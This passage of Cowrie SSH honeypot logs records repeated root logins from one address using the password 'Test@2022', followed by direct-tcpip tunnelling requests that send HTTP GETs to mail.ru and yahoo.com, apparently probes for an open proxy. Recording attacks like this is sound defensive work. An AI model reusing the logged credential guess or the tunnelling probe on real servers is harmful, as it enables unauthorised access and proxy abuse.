{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.589797Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6482,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6482","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.641287Z","session":"06c6b6c1bf14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.691772Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":19191,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19191","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.836701Z","session":"06c6b6c1bf14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:27.887074Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":18783,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18783","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.028805Z","session":"06c6b6c1bf14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.079319Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.130535Z","src_ip":"77.83.207.83","session":"06c6b6c1bf14"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43807,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d11fd3db674","protocol":"ssh","message":"New connection: 77.83.207.83:43807 (1.2.3.4:22) [session: 8d11fd3db674]","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.179150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.189189Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.229075Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.477349Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31699,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31699","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.528043Z","session":"8d11fd3db674"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.577927Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":12702,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12702","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.720190Z","session":"8d11fd3db674"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.770180Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":28602,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28602","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.912246Z","session":"8d11fd3db674"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:28.961935Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.012692Z","src_ip":"77.83.207.83","session":"8d11fd3db674"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43885,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e9d26e78696","protocol":"ssh","message":"New connection: 77.83.207.83:43885 (1.2.3.4:22) [session: 8e9d26e78696]","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.061488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.062350Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.112117Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.360358Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6361,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6361","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.411050Z","session":"8e9d26e78696"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.460933Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":10976,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10976","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.604240Z","session":"8e9d26e78696"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.654009Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":25868,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25868","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.796144Z","session":"8e9d26e78696"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.846358Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.897367Z","src_ip":"77.83.207.83","session":"8e9d26e78696"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43959,"dst_ip":"1.2.3.4","dst_port":22,"session":"301cb45ba954","protocol":"ssh","message":"New connection: 77.83.207.83:43959 (1.2.3.4:22) [session: 301cb45ba954]","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.946812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.947763Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:29.998774Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.251802Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1106,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1106","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.303468Z","session":"301cb45ba954"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.354260Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":28607,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28607","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.496985Z","session":"301cb45ba954"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.547626Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":15588,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15588","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.689138Z","session":"301cb45ba954"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.740020Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.791544Z","src_ip":"77.83.207.83","session":"301cb45ba954"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44051,"dst_ip":"1.2.3.4","dst_port":22,"session":"8545533a00ba","protocol":"ssh","message":"New connection: 77.83.207.83:44051 (1.2.3.4:22) [session: 8545533a00ba]","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.840431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.841458Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:30.891319Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.139928Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29842,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29842","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.190961Z","session":"8545533a00ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.240861Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":619,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:619","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.384144Z","session":"8545533a00ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.433929Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19994,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19994","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.576100Z","session":"8545533a00ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.625782Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.676620Z","src_ip":"77.83.207.83","session":"8545533a00ba"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44149,"dst_ip":"1.2.3.4","dst_port":22,"session":"c64229aa3090","protocol":"ssh","message":"New connection: 77.83.207.83:44149 (1.2.3.4:22) [session: c64229aa3090]","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.725920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:31.736060Z","src_ip":"77.83.207.83","session":"c64229aa3090"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed